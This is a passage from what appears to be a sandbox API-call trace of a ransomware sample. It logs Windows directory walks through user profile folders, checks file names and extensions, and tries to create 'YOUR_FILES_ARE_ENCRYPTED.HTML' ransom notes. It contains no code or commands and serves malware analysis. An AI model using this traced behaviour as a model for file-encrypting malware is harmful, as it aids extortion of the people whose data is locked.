ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0170.198] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.198] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0170.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.198] GetProcessHeap () returned 0x270000 [0170.199] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.203] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0170.203] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned 50 [0170.203] GetProcessHeap () returned 0x270000 [0170.203] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x10000) returned 0x74ea008 [0170.205] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" [0170.205] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*" [0170.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x99c671b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, 
ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0170.205] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 133 [0170.205] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0170.205] lstrlenW (lpString=".swidtag") returned 8 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b3500, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x7c798490, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x45b3500, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0170.205] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 129 [0170.205] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0170.206] lstrlenW (lpString=".swidtag") returned 8 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 132 [0170.206] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0170.206] lstrlenW (lpString=".swidtag") returned 8 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, 
ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.206] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.206] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.206] GetProcessHeap () returned 0x270000 [0170.207] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: 
hHeap=0x270000) returned 1 [0170.207] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0170.207] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Start Menu") returned 33 [0170.207] GetProcessHeap () returned 0x270000 [0170.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.207] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu") returned="\\\\?\\C:\\Users\\All Users\\Start Menu" [0170.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu\\*") returned="\\\\?\\C:\\Users\\All Users\\Start Menu\\*" [0170.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="膠݀")) returned 0xffffffff [0170.207] GetProcessHeap () returned 0x270000 [0170.208] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) 
returned 1 [0170.208] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0170.208] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Templates") returned 32 [0170.208] GetProcessHeap () returned 0x270000 [0170.208] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.208] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Templates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates") returned="\\\\?\\C:\\Users\\All Users\\Templates" [0170.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates\\*") returned="\\\\?\\C:\\Users\\All Users\\Templates\\*" [0170.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="膠݀")) returned 0xffffffff [0170.209] GetProcessHeap () returned 0x270000 [0170.209] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.209] 
FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd039ec0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.210] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.210] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd039ec0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.210] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0170.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.210] GetProcessHeap () returned 0x270000 [0170.211] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0170.213] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0170.213] GetProcessHeap () returned 0x270000 [0170.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.213] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0170.213] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*") returned="\\\\?\\C:\\Users\\Default\\*" [0170.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0170.213] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.214] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="AppData", cAlternateFileName="")) returned 1 [0170.214] GetProcessHeap () returned 0x270000 [0170.214] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.215] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\AppData" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData") returned="\\\\?\\C:\\Users\\Default\\AppData" [0170.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*" [0170.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.215] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", 
cAlternateFileName="")) returned 1 [0170.216] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Local", cAlternateFileName="")) returned 1 [0170.216] GetProcessHeap () returned 0x270000 [0170.216] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.219] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local" [0170.219] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*" [0170.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.221] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.222] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0170.222] GetProcessHeap () returned 0x270000 [0170.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.222] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" [0170.222] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*" [0170.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x7690008, ftCreationTime.dwLowDateTime=0x74ea008, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0170.223] 
GetProcessHeap () returned 0x270000 [0170.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0170.224] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 1 [0170.224] GetProcessHeap () returned 0x270000 [0170.224] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.224] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" [0170.224] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*" [0170.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*", 